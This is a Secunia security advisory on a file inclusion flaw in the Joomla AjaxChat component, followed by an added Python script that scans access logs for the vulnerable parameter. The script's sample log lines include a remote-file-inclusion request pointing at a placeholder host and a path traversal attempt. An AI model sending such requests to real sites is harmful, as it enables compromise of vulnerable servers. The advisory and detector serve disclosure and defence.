Joomla AjaxChat Component File Inclusion Vulnerability

SECUNIA ADVISORY ID:
SA37087

VERIFY ADVISORY:
http://secunia.com/advisories/37087/

DESCRIPTION:
kaMtiEz has reported a vulnerability in the AjaxChat component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter in
/components/com_ajaxchat/tests/ajcuser.php is not properly verified
before being used to include files. This can be exploited to include
arbitrary files from local or external resources.
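
A log check for the request pattern described above, as an added example that is not part of the original advisory or of the AjaxChat code: it flags access-log entries whose query string sets "mosConfig_absolute_path", a value that should never arrive from the client. The combined log format, the function names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "mosconfig_absolute_path"  # parameter named in the advisory (compared lowercased)
SCRIPT = "/components/com_ajaxchat/tests/ajcuser.php"  # script named in the advisory
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Two or more scheme characters, so a Windows drive letter ("C:") is not taken for a URL.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)

# Constructed sample lines in combined log format (documentation addresses, made-up values).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /components/com_ajaxchat/tests/ajcuser.php?mosConfig_absolute_path=http%3A%2F%2Fhost.invalid%2Fa.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2010:10:00:09 +0000] "GET /site/components/com_ajaxchat/tests/ajcuser.php?mosConfig_absolute_path=..%2F..%2Fnotes.txt HTTP/1.1" 500 0',
    '203.0.113.4 - - [01/Jan/2010:10:01:00 +0000] "GET /index.php?MOSCONFIG_ABSOLUTE_PATH= HTTP/1.0" 404 0',
]

def classify(value):
    """Label the client-supplied include path: 'url', 'path' or 'empty'."""
    if not value:
        return "empty"
    return "url" if SCHEME_RE.match(value) else "path"

def scan(lines):
    """Return one finding per request whose query string sets the parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target, status = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes names and values; only the query string is
        # visible in an access log, so a value sent in a POST body is not seen here.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() == PARAM:
                findings.append({
                    "client": client,
                    "status": int(status),
                    "known_script": url.path.lower().endswith(SCRIPT),
                    "kind": classify(value),
                })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with "known_script" true and a 200 status is the one to triage first; the other findings show the same parameter being probed against other paths.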

SOLUTION:
Edit the source code to ensure that input is properly verified.

PROVIDED AND/OR DISCOVERED BY:
kaMtiEz

ORIGINAL ADVISORY:
http://packetstormsecurity.org/0910-exploits/joomlaajaxchat-rfi.txt
